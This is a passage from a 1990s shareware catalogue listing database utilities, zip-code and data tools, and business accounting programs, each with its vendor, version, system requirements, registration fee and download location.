Compatible + * Context sensitive help + + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 488. + + Chapter 5, "Database applications" 293 + + + + Product: Recap [***] + Author: R.K. West Consulting + Version: 5.1 (08-14-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. dBase-compatible data file. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: RECAP51.ZIP on BBSs; RECAP.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + It can be very frustrating to find that some of your database + records have been entered in all caps when you didn't want them + that way, or that some have not been entered in all caps when + you did want them that way! Goes through any dBase-III + compatible database file and make the desired adjustments. Can + save you from hours of re-entering data. + + + Product: Simstat + Complete statistics and simulation program. See full + description on page 448. + + Product: ToolDriver + Developer tools to organize files and names. See full + description on page 493. + + Product: UnderBar + Automatic printing of POSTNET bar codes. See full description + on page 99. + + Product: WinBrowse + Multiple PC database utility program. See full description on + page 291. + + Product: WonderBar + TSR to print POSTNET bar code for mailing. See full + description on page 101. + + 5.6.2 For dBASE + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 276. + + Chapter 5, "Database applications" 294 + + + + Product: DBKIT [***] + Author: P. C. Softsmith, 604-433-5189 + Version: 2.5 (03-01-94) + Needs: IBM PC, DOS 3.1 or better. 521k RAM; Hard disk. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: DB**.ZIP on BBSs (multiple files). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Provides a wide range of maintenance, development, monitoring, + and management tasks without an interpreter. Command line + orientation. Includes teleshare gather remote & local file + management & remote support. + + + Product: dVERSION + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 2.0 (09-05-93) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM. + Registration fee: $55.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DVER.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 67k (about five minutes with a 2400 baud modem) + Description: + Conditionally translates xBASE code. Lets the programmer have + many versions of an application in one set of source code. + + Chapter 5, "Database applications" 295 + + + + Product: Workbase [***] + Author: R.K. West Consulting + Version: 4.3 (05-15-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. Some knowledge of Xbase + commands and functions. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: WORK43.ZIP on BBSs; WORK.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10251 + Download size: 235k (about 18 minutes with a 2400 baud modem) + Awards & nominations: 1990 winner, Public Brand Software + contests for useful programs. + Description: + Xbase developers: this is an interactive environment for over + 200 Xbase commands and functions, including some that may be + new to you. Create, append, edit, browse, restore from and save + to MEM files, display memory, display structure, modify + structure - many other commands for development, + troubleshooting and support. Includes rudimentary PRG + interpreter. If your applications use dBase-compatible files, + you'll love this handy utility. Unlike other "dot prompt" + programs, this one works! + + + 5.6.2.1 dBASE III specific + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 60. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 455. + + Chapter 5, "Database applications" 296 + + + + 5.6.3 For FoxPro/FoxBASE+ + + Product: Data Wire Four + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 1.4.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $25.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DW4.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 17k (about two minutes with a 2400 baud modem) + Description: + A Foxpro procedure designed to allow an application to verify + databases quickly and easily. In essense, the programmer + executes DW4, generating a data dictionary program. It has a + 'picture' of all databases in the current directory. When + executed, it verifies that all specified databases exist and + have the correct field layouts. Structural indices are also + verified. The generated program can execute alone or within a + Foxpro application. + + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 276. + + Product: DBKIT [***] + Xbase programming & maintenance. See full description on + page 293. + + Chapter 5, "Database applications" 297 + + + + Product: dMAIL4 + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 4.0.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DMAIL4.ZIP on CompuServe + in CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 434k (about 32 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track a simple + mailing list database. Among its features is the ability to + run in a network environment. Can access customer records by a + variety of indices. Records can be imported and exported to a + variety of file formats. + + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 60. + + Product: Hard Wire Four + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 2.8.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $45.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; HW4.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 77k (about six minutes with a 2400 baud modem) + Description: + A set of procedures to give the programmer a means to create an + application quickly and easily. In essense, the programmer + creates a data dictionary. This database defines all + parameters to create and maintain the files with an + application. An edit procedure, often called the 'little black + box', then can be used to perform the actual file maintenance. + + Chapter 5, "Database applications" 298 + + + + Product: SAC DATABASE + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 2.7.2 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; bonus graphics; discounts on other + products. + Look for: availability unknown on BBSs; SAC.ZIP on CompuServe in + CIS:ASTROFORUM forum LIBrary 5 (or contact userID 73304,1222 + for assistance). + Download size: 865k (about 64 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track the Saguaro + Astronomy Club database. This database includes deep-sky and + double star objects. Among its features is its ability to + access records by a variety of indices (including notes). It + will also let you keep user logs on various objects. + + + Product: Shell + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 1.2.3 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $45.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; SHL.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 372k (about 28 minutes with a 2400 baud modem) + Description: + A Foxpro application that will allow the user to launch + selected and password protected Foxpro applications. Passwords + can be maintained by user or application. + + Chapter 5, "Database applications" 299 + + + + Product: Sub-contracor Billing + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 2.2.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; JOB.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 429k (about 32 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track sub- + contractor billing. Among its features is the ability to run + in a multi-user enviroment. It can access invoices by either + invoice number or client code. It can also record a single + check payment of multiple invoices. + + + Product: Version Control & Maintenance + Author: C & R Business Systems Ltd., 616-281-3333 + Version: 2.8.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; VCM.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 473k (about 35 minutes with a 2400 baud modem) + Description: + Lets either the client or the programmer maintain their + database of source code. As the client, it lets you obtain the + latest source code. As a programmer, it lets you maintain + another programmer's database of code. At the same time, other + programmers can keep up with your modifications. All without + the need to 'check-out' program files. + + + 5.6.4 For Paradox + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 276. + + Chapter 5, "Database applications" 300 + + + + Product: Report Utility for Paradox/DOS + Author: The C Group, Inc., 718-251-1891 + Version: 2.04 (02-12-94) + Needs: IBM PC, DOS 3.3 or better. 2048k RAM. Paradox for DOS + version 3.5-4.5. + Registration fee: $15.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: RPTUTL.ZIP on BBSs (call 718-241-0225 to download it at + no charge); RPTUTL.ZIP on CompuServe in CIS:PDOXDOS forum + LIBrary 13 (or contact userID 76670,2602 for assistance). + SWREG#: 2004 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Lets you move, copy and sumamrize fields and calculated fields + on a Paradox Report. This is a definite must for any users of + Paradox/Dos. It gives you the functionality Borland left out. + Considerably less expensive than other programs of its type. + + + 5.6.5 For Clipper + + Product: Builder + Author: Aeolus Software, 612-730-4135 + Version: 2.2 (10-27-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $59.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of unlimited phone, CompuServe, mail support; royalty- + free source code; bonus utilities; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs. + PsL#: 11233 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + A Clipper(tm) program source code generator. Create colorful + windowing text applications quickly and easily. Select from + several menu styles and window appearances. Automatic file + maintenance for primary and relation tables. Select from many + canned VALIDs. Memo field support. TBrowse and drop down + lists new to this version. Creates mouseable applications. + Report code generator also included. All your Clipper + programming needs in one package! + + Chapter 5, "Database applications" 301 + + + + Product: DBKIT [***] + Xbase programming & maintenance. See full description on + page 293. + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 60. + + Product: Workbase [***] + Dot-prompt utility for DBMS programmers. See full description + on page 294. + + 5.6.6 For other + + Product: Btr Watch + Author: Informative Technologies, 202-675-4528 + Version: 1.0 (09-15-91) + Needs: IBM PC, DOS 3.1 or better. BTRIEVE.EXE or BREQUEST.EXE + and a Btrieve application. + Registration fee: $29.00 + Registration benefits: Latest version of Btr Watch / One year of + support / Bonus disk of other software to evaluate / $7 off + subscription to Shareware Magazine. + Look for: PROG. CORNER on BBSs (call 301-596-1180 to download it + at no charge); BWCH10.ZIP on CompuServe in CIS:NOVA forum + LIBrary 14 (or contact userID 74777,3004 for assistance). + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + This memory resident Btrieve debugger traces the interaction + between your application and Btrieve files. Monitors calls to + Btrieve and makes an entry into a log file every time a Btrieve + file is accessed. The time, date, file name, operation, + duration, and result of each access is recorded. Network- + compatible and can trace file accesses from multiple + workstations. Catches files that have been opened multiple + times without closing them. + + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 491. + + Chapter 5, "Database applications" 302 + + + + Product: SC-Scripter + Author: SplitCycle Computing, 904-292-4770 + Version: 1.0 (08-27-94) + Needs: IBM 80386, DOS 3.3 or better. 200k RAM; Network (LAN). + NetLib for SQL Server from Microsoft/Sybase. + Registration fee: $39.00 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 6). 12-month free upgrading allowed. + Look for: availability unknown on BBSs; SCSCRP.ZIP on CompuServe + in CIS:SYBASE forum LIBrary 13 (or contact userID 73501,1261 + for assistance). + SWREG#: 3341 + Download size: 91k (about seven minutes with a 2400 baud modem) + Description: + A fast and easy SQL server management assistant that can + increase developer and database administrator productivity. It + will generate Transact-SQL scripts for entire databases or + individual objects. Its command line interface allows database + definitions to be generated as part of your complete backup + procedures. Can be a valuable tool in moving, restoring and + examining databases. + + + 5.7 Other + + Product: TRAINING MANAGEMENT SYSTEM + Author: Oscar Wenholm, 605-532-3479 + Version: 1.2 (04-15-94) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: Hard disk. + Registration fee: $30.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; site + license; bonus utilities; all ASP-wide offers (see page 6). 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs; TMS12.EXE on CompuServe + in CIS:MILITARY forum LIBrary 14 (or contact userID 71533,344 + for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Designed for use by Army supervisors to track training. The + trainer enters go/no go data and dates and the program provides + reports that document training and assist in planning training. + It supports the Army Training Management System. Reports + produced include the Field Expedient Squad Book (DA Form + 5165-R). The Individual Soldier Report is a valuable aid in + performance counseling. The Training Evaluation Report shows + total stats for the group. + + Chapter 6, "Data" 303 + + + + + + Chapter 6 + Data + + + 6.1 Words + + Product: Curses! [***] + Creative insult generator. See full description on page 681. + + 6.1.1 Names + + Product: HangWin + Hangman word game with sound. See full description on + page 705. + + + 6.2 Mapping data + + See also: Engineering, Surveying & cartography; Graphics, + Business applications, Mapping/cartography. + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 573. + + Product: PMFLCOMP + ASCII/hex/checksum file compare for OS/2. See full description + on page 56. + + Product: VERSAMAP + Draws outline maps on 13 map projections. See full description + on page 574. + + + 6.3 Corporate data + + Product: I&M USA + Mfr. directory for process controls. See full description on + page 414. + + + 6.4 Marketing data + + Product: CD-ROM Guide + Directory of DOS & Windows CD-ROM Titles. See full description + on page 585. + + Product: RagTime for Windows + Event & recreation planner for women (& guys). See full + description on page 151. + + Chapter 6, "Data" 304 + + + + 6.4.1 Shareware specific + + See also: About shareware, Assn. Shareware Professionals. + + Product: MDS OBRA ASSESSMENT TOOL + Computerized MDS assessment database. See full description on + page 172. + + + 6.5 World facts + + Product: On This Day + "What happened on this day in history?" See full description + on page 539. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 540. + + Product: Wynter Stone's Quick Guide [***] + Mini-encyclopedia of mystical information. See full + description on page 600. + + + 6.6 Zip codes + + Product: ZIPKEY + Author: Eric Isaacson Software, 812-339-1811 + Version: 2.04e (05-01-93) + Needs: IBM PC, DOS 2.0 or better. 22k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, BBS, CompuServe, + mail support; 1-month return policy; bonus data. + Look for: ZK*.ZIP on BBSs (call 812-855-7252 to download it at no + charge); ZIPKEY.ZIP on CompuServe in CIS:ZIPKEY forum LIBrary + 14 (or contact userID 71333,3154 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + 1989 winner, Public Brand Software contests for useful + programs. + Description: + A complete city-level database of zip codes and telephone area + codes, combined with a keyboard enhancement program. Will pop + up over your text-mode application, look up a zip code, and + feed the results via keystrokes to your application. May be + configured to generate any sequence of keystrokes you wish. + Incredibly fast and compact. You can literally type a city, + state, zip code, and area code in seven keystrokes. + + Chapter 6, "Data" 305 + + + + Product: Zippidy Do Da(tm) + Author: SMI Corporation, 918-241-2301 + Version: 1.01 (12-05-93) + Needs: IBM AT (80286), Windows 3.1 or better. 3072k RAM; Hard + disk. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $7.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 6); + discounts on other products. + Look for: ZP100*.ZIP on BBSs (multiple files) (call 918-747-2542 + to download it at no charge); ZP100*.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (multiple files) (or contact + userID 72644,2335 for assistance). + Download size: 1760k (about 131 minutes with a 2400 baud modem) + Description: + This program can search by zip code, state, area code, city or + the sound of the city name. Very visual user interface with + context sensitive help. Supports reporting and custom reports + via SQL queries. Even shows the time at the selected city vs. + your local time. Very useful! + + + Product: ZK-Shell + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Version: 1.0 (04-22-92) + Needs: IBM AT (80286), Windows 3.1 or better. ZIPKEY from Eric + Isaacson Software. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 12 months of toll 900# phone, fax, + CompuServe, GEnie, mail support. + Look for: ZKSHELL.ZIP on BBSs; ZKSHEL.ZIP on CompuServe in + CIS:OAFORUM forum LIBrary 4 (or contact userID 76711,1141 for + assistance); ZKSHELL.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID P.MAYER1 for assistance). + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + This Windows application lets you use the popular ZIPKEY + program in Windows. Look up ZIP codes or City and State and + paste into Windows applications. + + + 6.7 Area codes + + Product: dbDIAL(tm) + 7k TSR database/dialer. See full description on page 159. + + Chapter 6, "Data" 306 + + + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 156. + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 304. + + Product: Zippidy Do Da(tm) + Zipcode/areacode lookup tool with time info. See full + description on page 304. + + Product: ZK-Shell + Run ZIPKEY ZIP Code lookup in Windows. See full description on + page 305. + + + 6.8 Census data + + Product: MAPIT + Detailed world mapping with GPS data import. See full + description on page 573. + + + 6.9 Engineering data + + See also: Engineering. + + 6.9.1 For mechanical engineering + + Product: Nominal Pipe Size for Windows + Displays data for different sizes of pipe. See full + description on page 417. + + Product: Water and Steam Properties + Properties of ice, water and steam. See full description on + page 412. + + 6.9.2 For other + + Product: I&M USA + Mfr. directory for process controls. See full description on + page 414. + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 409. + + Product: Nominal Pipe Size for Windows + Displays data for different sizes of pipe. See full + description on page 417. + + Chapter 6, "Data" 307 + + + + Product: Periodic Table + Electronic table of elements with decay data. See full + description on page 546. + + Product: Sci & Eng Tool for Lotus 1-2-3 + Author: K.I.T.A.L. Software, 972-498-7255 + Version: 1.3 (06-01-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM. Lotus 1-2-3 2.0 or + better. + Registration fee: $40.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + A programmable sopisticated calculator and solver. Includes: + arithmetic, integration and differentiation of data tables and + functions, curvefit (polynomial up to order 8, powers product, + exponent, multiilinear up to 8), matrix operation, linear sytem + 70 unknown, statistics, normal distribution, frequency + distribution, unit conversion, one unknown non linear equation + solver. It is a menu driven Lotus application with Lotus's + style menu bar. + + + Product: WinDatCon + Windows data conversion program. See full description on + page 145. + + + 6.10 Quotes & anecdotes + + See also: Home & hobby, Quotes & anecdotes. + + Product: PC-Fortune + Author: JAYAR Systems, 416-751-5678 + Version: 2.20 (09-30-92) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $24.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus data; all ASP-wide offers + (see page 6). + Look for: PCF220.ZIP on BBSs (call 519-940-0007 to download it at + no charge). + Download size: 187k (about 14 minutes with a 2400 baud modem) + Description: + A "fortune cookie" program that selects and displays a fortune + at random from its data base of over 2,200 fortunes, quotes, + sayings, jokes, etc. A different item is selected each time + + Chapter 6, "Data" 308 + + + + until all have been displayed, then it starts over. You may + also select items by number. Program can run from command line + or from AUTOEXEC.BAT. + + + 6.11 Encyclopedias + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 276. + + + 6.12 Software tools & add-ins + + 6.12.1 For multiple programs + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 499. + + + 6.13 Other + + Product: NOACH + Author: Feico Nater Shareware, 31-74-438373 + Version: 2.4 (01-04-92) + Needs: IBM PC, DOS 2.0 or better. Mouse recommended. + Registration fee: $50.00 + Registration benefits: Phone/mail support, free updates. + Look for: NOACH.* on BBSs; NOACH.* on GEnie in 0 forum LIBrary 0. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Add and modify family-relations: parents, children, consorts. + Space provided for: name, place and date of birth, of death, of + christening, of burial, of marriage, of divorce, occupation, + current address. Max number of persons and matrimonies: 65535. + Children per parent: unlimited. Multiple consorts: possible. + Many features help entering data: copy name, occupation, etc. + from another person, display calendar of any year with easter- + date. Quick display of anyone's family-tree. + + Chapter 7, "Business" 309 + + + + + + Chapter 7 + Business + + See also: Spreadsheet applications; Database applications, + Mailing list systems; Data; Communications, Call logging & + analysis; Finances; Graphics, Business applications. + + + 7.1 Business finances + + See also: Finances, Personal finances. + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 404. + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 638. + + Product: EXPRESSCALC + Powerful, easy-to-use. Great for home, office. See full + description on page 271. + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 393. + + Product: Financial Freedom + Complete finance management for Windows. See full description + on page 396. + + Product: Financial Freedom GOLD + Our high-end money management for Windows. See full + description on page 396. + + Product: Inventory Interface + Full featured inventory, MRP and POS package. See full + description on page 339. + + Chapter 7, "Business" 310 + + + + Product: PCLoan5 + Author: Bottom Line Software, Inc., 214-394-4087 + Version: 5.09 (09-01-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM. + Registration fee: $79.97 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A professional loan/mortgage/lease amortization system. + Supports all common methods of simple interest calculation + including daily interest, periodic interest, variable rates, + and negative amortization. + + All schedules are stored on disk and may be edited, + recalculated, viewed, or printed, repeatedly. Any loan term may + be changed at any time (even between payments). Non-scheduled + payments may be added and scheduled payments may be deleted. + + Calculator provides REG-Z APR, including points. + + + Product: WinCharging + Author: My Little Realm Enterprises, 201-529-8318 + Version: 1.0 (04-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Registration fee: $24.95 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: WINCRG10.ZIP on BBSs; WINCRG.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + PsL#: 11734 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + With credit card issuers offering cash back, sizeable rebates + on new cars, and more, it pays to use your credit cards. This + helps you make the most of the deals that appeal to you, and it + helps you use your credit cards wisely. It comes with an + introductory help file that walks you through the setup so it's + virtually painless. It makes managing your accounts easy and + ensures that your cards work for you by monitoring credit + limits and spending caps. It does reports and much more. + + Chapter 7, "Business" 311 + + + + Product: WinCheck + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 3.0P (02-01-92) + Needs: Unknown. 100k RAM. + Registration fee: $69.99 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, BBS, CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). + Look for: WC-30P.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WC-30P.ZIP on CompuServe in CIS:WILSON forum + LIBrary 0 (or contact userID 76702,1072 for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + Full featured personal finance manager for the home and small + business. Desinged to manage any number of checking, savings + and credit card accounts. Features include a check form + designer, to build check templates for printing on virtually + any pre-pointed check form. The Custom Report Maker allows + viewing and printing a variety of supplied reports and create + custom reports tailored to needs. + + + 7.1.1 Business accounting + + Product: Bottom Line Accounting + Author: WindSoft International, Inc., 407-240-2300 + Version: 2.5E (02-04-94) + Needs: IBM 80386, DOS 4.0 or better. 2048k RAM; Hard disk. + Registration fee: $499.95 (add $7.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $33.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + 1-month limited return policy; all ASP-wide offers (see + page 6); discounts on other products. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; BLA-?.EXE on CompuServe + in CIS:IBMAPP forum LIBrary 5 (multiple files) (or contact + userID 75300,562 for assistance). + Download size: 5120k (about 380 minutes with a 2400 baud modem) + Description: + Easy to learn/use. No month-end closings required. Allows pre + and post-dated transactions. Unlimited transactions. On-the- + fly transactions/check writing. Allows errors to be easily + corrected. Context sensitive help screens. Complete reports & + graphs. Supports W-2's & 1099's. Paradox file structure. + Import/export/merge data files. Built-in backup. Drop-to-DOS + feature. Quick installation & setup. + + Chapter 7, "Business" 312 + + + + Product: Business Clock Link + Time clock w/ job reporting, E-mail, network. See full + description on page 345. + + Product: Cash Control + A personal finance and business checkbook. See full + description on page 399. + + Product: CS/AMORT + Author: Computer Solutions, Inc. + Version: 2.10 (10-08-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive. + Registration fee: $24.50 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on upgrades. + Look for: CSAM21.ZIP on BBSs; CSAM21.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 5 (or contact userID 75047,3521 for + assistance). + Download size: 122k (about nine minutes with a 2400 baud modem) + Description: + Specifically designed to produce loan amortization schedules + for mortgage loans, as well as many types of commercial loans + (auto, personal, etc.). Contains many special features required + to produce proper amort schedules for various mortgage loans, + such as Fixed rate mortgages, graduated payment mortgages, + adjustable rate mortgages, bi-weekly mortgages and a number of + others. Loan amortization calculations are based on the rules + published by FHA in the Federal Register. + + + Product: DAYO ACCOUNTS PAYABLE (AP) + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.61+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + 